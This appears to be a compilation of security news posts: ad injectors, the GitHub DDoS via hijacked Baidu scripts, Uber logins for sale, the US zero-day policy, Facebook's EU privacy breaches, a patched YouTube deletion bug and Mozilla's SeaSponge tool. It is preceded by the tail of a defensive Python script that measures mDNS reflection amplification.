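    for p in pairs.values():
        p["amplification"] = p["bytes_out"] / p["bytes_in"] if p["bytes_in"] else float("inf")
    return dict(exposed), dict(pairs)


def report(flows):
    """Human-readable summary; the last line restates the CERT mitigation."""
    exposed, pairs = analyse_flows(flows)
    lines = [f"{dev}: answered {n} unicast mDNS query(ies) from outside the link"
             for dev, n in exposed.items()]
    for (reflector, outside), p in pairs.items():
        lines.append(f"{reflector} -> {outside}: {p['replies']} replies, "
                     f"amplification {p['amplification']:.1f}x")
    lines.append("mitigation: drop UDP/5353 inbound and outbound on the WAN interface")
    return lines
```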
18. Google is preparing to release new research on the prevalence of ad injectors, the often-unwanted browser extensions that inject ads onto Web pages, and the numbers will show just how widespread and problematic the software is.

Ad injectors belong to that great, amorphous pile of applications that aren’t necessarily classed as malware but exhibit behavior that is unwanted by users. They’re designed to push ads onto the pages that users visit and they typically come in the form of browser extensions. Users sometimes install them purposely, but often ad injectors come bundled with other applications and can be difficult to remove.

Google has been adjusting the way that it handles deceptive and unwanted software and its Chrome browser will display a warning when a user is going to download an ad injector from the Chrome Web store. The company doesn’t ban all ad injectors across the board, but will remove deceptive apps from the Web store. Google said that it has received more than 100,000 complaints from Chrome users about ad injectors in just the past three months.

In a few weeks, Google plans to release some joint research on ad injectors it did with the University of California at Berkeley. Some of the findings that came out of the research make it clear that ad injectors represent a fairly large-scale problem for users:
- Ad injectors were detected on all operating systems (Mac and Windows), and web browsers (Chrome, Firefox, IE) that were included in our test.
- More than 5% of people visiting Google sites have at least one ad injector installed. Within that group, half have at least two injectors installed and nearly one-third have at least four installed.
- Thirty-four percent of Chrome extensions injecting ads were classified as outright malware.

Google’s Nav Jagpal said in a blog post that the research found nearly 200 deceptive extensions in the Chrome Web store, which have been disabled. Jagpal said Google plans to release the full results of the research on May 1.

Source
19. I reported another one 5 days ago and the reply only came today. It's not much, but it works. The XSS was in the form for adding a listing.
20. Internet users outside China are unwittingly participating in a long-running cyber-attack on the coding site GitHub, security experts have said. The researchers believe that the nature of the attack makes the Chinese government the only realistic source. After five days, it was understood on Tuesday evening that the attack was decreasing in intensity. The Chinese government said it was "odd" that it had been accused of being responsible.

GitHub said that it had first detected a large distributed denial of service (DDoS) attack - when a site is flooded with traffic, threatening to force it offline - last Thursday. Four separate security researchers have said that international web traffic to sites that use analytics tools provided by search firm Baidu was being hijacked in China. According to analysis published by Erik Hjelmvik of the firm Netresec, when browsers requested script from the Chinese firm's servers, as they normally would, malicious code was inserted into the reply.

"The upshot is that people from around the world... had their traffic redirected to swamp GitHub," Prof Alan Woodward of the University of Surrey told the BBC after verifying the research.

It is alleged that the attack was targeted at two pages on GitHub: one created by the anti-censorship group Greatfire.org, the other a Chinese-language edition of the New York Times. Both are banned by the Chinese authorities. Mr Hjelmvik's analysis was backed up by similar research published by Insight Labs, a global group of security organisations. Their conclusions were ratified by both Rik Ferguson, from the cybersecurity firm Trend Micro, and Prof Woodward.

In a blog, Mr Hjelmvik described the attack step-by-step:
- An innocent user browses the internet from outside China
- One website the user visits loads an analytics script - a sequence of instructions - from a server in China, for example Baidu, something that is often used by web admins to track visitor statistics
- The web browser's request for the Baidu script is detected by Chinese equipment as it enters the country
- A fake response is sent out from within China instead of the actual Baidu Analytics script. This fake response is a malicious script that tells the user's browser to continuously reload two specific pages on GitHub.com

'Malicious'
The method could be used on a multitude of sites that passed into and back out of China, the researchers said. "Any site that makes the request for a cookie related to Baidu's analytics, that request could be replaced with malicious code," said Mr Ferguson.

Mr Hjelmvik told the BBC that, because the various internet service providers used by the foreign internet users were seeing the same results, the attacker could only be an entity with overarching control of telecommunications across China. That, he said, made the country's authorities the most realistic suspect.

In a press conference on Monday, the Chinese foreign ministry's spokeswoman Hua Chunying was asked for her response to reports that her government was behind the attack. "It is quite odd that every time a website in the US or any other country is under attack, there will be speculation that Chinese hackers are behind it. I'd like to remind you that China is one of the major victims of cyber attacks," she said. "We have been underlining that China hopes to work with the international community to speed up the making of international rules and jointly keep the cyberspace peaceful, secure, open and cooperative. "It is hoped that all parties can work in concert to address hacker attacks in a positive and constructive manner."

The BBC understands that the attack appears to be weakening and GitHub is now said to be operating "at 100%". A GitHub spokesman reiterated its earlier statement, highlighting that the attack was the "largest DDoS" in the site's history.

Source
  21. Uber insisted it had not been hacked following the discovery that log-in information for thousands of the car-sharing service's users is widely available on the online black market. Motherboard confirmed last week that several dark Web forums — hidden from the regular internet using the online anonymity software Tor — were selling working log-ins for Uber for as little as $1. Uber denies the information was taken from its own servers, however. “We investigated and found no evidence of a breach,” the company said in a statement. “Attempting to fraudulently access or sell accounts is illegal and we notified the authorities about this report.” An Uber log-in can not only be used to rack up fraudulent trips, but would also give access to the user’s travel history, exposing home addresses. An account also contains partial credit card information. Uber said the log-ins might have been lifted by either breaking weak passwords, or by trying passwords exposed in other data breaches. “This is a good opportunity to remind people to use strong and unique usernames and passwords, and to avoid reusing the same credentials across multiple sites and services,” Uber said. The company’s data security has made headlines in recent months. In late February, it came out that the personal information of up to 50,000 drivers had been compromised during a May 2014 breach. The 2014 hack is not related to the current rash of Uber log-ins for sale, the company said. Source
22. AROUND THE SAME time the US and Israel were already developing and unleashing Stuxnet on computers in Iran, using five zero-day exploits to get the digital weapon onto machines there, the government realized it needed a policy for how it should handle zero-day vulnerabilities, according to a new document obtained by the Electronic Frontier Foundation.

The document, found among a handful of heavily redacted pages released after the civil liberties group sued the Office of the Director of National Intelligence to obtain them, sheds light on the backstory behind the development of the government’s zero-day policy and offers some insight into the motivations for establishing it. What the documents don’t do, however, is provide support for the government’s assertions that it discloses the “vast majority” of zero-day vulnerabilities it discovers instead of keeping them secret and exploiting them.

“The level of transparency we have now is not enough,” says Andrew Crocker, a legal fellow at EFF. “It doesn’t answer a lot of questions about how often the intelligence community is disclosing, whether they’re really following this process, and who is involved in making these decisions in the executive branch. More transparency is needed.”

The timeframe around the development of the policy does make clear, however, that the government was deploying zero-days to attack systems long before it had established a formal policy for their use.

Task Force Launched in 2008
Titled “Vulnerability Equities Process Highlights,” (.pdf) the document appears to have been created July 8, 2010, based on a date in its file name. Vulnerability equities process in the title refers to the process whereby the government assesses zero-day software security holes that it either finds or buys from contractors in order to determine whether they should be disclosed to the software vendor to be patched or kept secret so intelligence agencies can use them to hack into systems as they please.

The government’s use of zero-day vulnerabilities is controversial, not least because when it withholds information about software vulnerabilities to exploit them in targeted systems, it leaves every other system that uses the same software also vulnerable to being hacked, including U.S. government computers and critical infrastructure systems.

According to the document, the equities process grew out of a task force the government formed in 2008 to develop a plan for improving its ability “to use the full spectrum of offensive capabilities to better defend U.S. information systems.”

Source
  23. Facebook is in violation of EU data laws owing to its overly complex privacy policies and persistent tracking of users, even if they have opted out of such systems. This was the key claim in a report by researchers at the University of Leuven and the Free University of Brussels on behalf of the Belgian Privacy Commission. “Our analysis indicates [that] Facebook is acting in violation of European law,” the report said. Specifically, the researchers are concerned that almost all data tracking and monitoring done by Facebook, such as for advertising purposes or gathering location data, is done without giving users adequate control over their privacy. “Its current default settings with regards to behavioural profiling and advertising (essentially 'opt-out') remain problematic,” the report said. “According to the Article 29 Working Party, consent cannot be inferred from the data subject’s inaction with regard to behavioural marketing. “As a result, Facebook’s opt-out system for advertising does not meet the requirements for legally valid consent. In addition, opt-outs for 'Sponsored Stories' or collection of location data are simply not provided.” The way Facebook combines data from its other services, specifically Instagram and WhatsApp, to build a more complete picture of a user was also cited as another way in which Facebook does not adhere to EU privacy and data laws. “Facebook only offers an opt-out system for its users in relation to profiling for third-party advertising purposes. The current practice does not meet the requirements for legally valid consent,” the report said. The report also criticised Facebook for “leveraging its dominant position” in the social networking market to effectively force users to accept its conditions. “The choices Facebook offers to its users are limited. For many data uses, the only choice for users is to simply 'take it or leave it'. 
If they do not accept, they can no longer use Facebook and may miss out on content exclusively shared on this platform,” the researchers said. Another interesting area raised in the report relates to the rights, or lack thereof, that Facebook provides to delete an account and have all data removed from the firm's databases. "Facebook fails to provide (sufficient) granularity in exercising data subject’s rights. For example, the right to erasure can only be exercised with regard to the user’s profile and only relates to self-posted content," it said. V3 contacted Facebook for its response to the report but had received no reply at the time of publication. The damning allegations come just a few months after Facebook updated its terms and conditions in an effort to make it easier for people to "take charge" of how their data is used on the site. Source
  24. Security bod Kamil Hismatullin has disclosed a simple method to delete any video from YouTube. The Russian software developer and hacker found videos can be instantly nuked by sending the identity number of a video in a post request along with any token. Google paid the bug hunter US$5000 for the find along with $1337 under its pre-emptive vulnerability payment scheme in which it slings cash to help recognised researchers find more bugs. "I wanted to find there some CSRF or XSS issues, but unexpectedly discovered a logical bug that let me delete any video on YouTube with just one request," Hismatullin says. "... this vulnerability could create utter havoc in a matter of minutes in [hackers'] hands who could extort people or simply disrupt YouTube by deleting massive amounts of videos in a very short period of time." Hismatullin says Google responded quickly when he reported the bug Saturday. He says he spent seven hours finding the bugs and resisted the near overwhelming urge to "clean up Bieber's channel". Google's Vulnerability Research Grants is described as cash with "no strings attached" that allows known security bods to apply for US$3133.70 to begin bug hunting expeditions. The search and service giant handed out some $1.5 million last year to bug hunters for reporting vulnerabilities. Source+video
  25. A trio of university undergraduates have worked with Mozilla to create an online threat modelling tool designed to help system administrators better understand the threats they face. The open source SeaSponge tool, developed under Mozilla's Winter of Security initiative, sports a graphical flow its designers say could be a replacement for Microsoft's free Threat Modelling Tool. Saint Mary's University students Sarah MacDonald, Joel Kuntz, and Glavin Wiechert built the tool. "SeaSponge allows you to model a system so that potential threats and risks can be identified," MacDonald says. "It supports multiple diagrams to model logical sections of your system in separate locations. Each diagram contains data flows and hardware and logical components." The trio says they developed the HTML5 tool because threat modelling, while important, is often missed in the software development lifecycle. The tool is built in part on Angularjs, jsPlumb, Bootstrap, CoffeeScript, Grunt, Bower, and Compass, and works on all browsers and operating systems. Developers focused on making SeaSponge easy to use and aesthetically pleasing to bring the "pizzazz" back into threat modelling. MacDonald says SeaSponge is still in its infancy and called on interested developers to contribute to its code. The Winter of Code project announcement follows the development of the Masche forensics tool which the browser giant had considered integrating into its architecture. Admins can play with a live demo of SeaSponge or download it from GitHub. Source+Video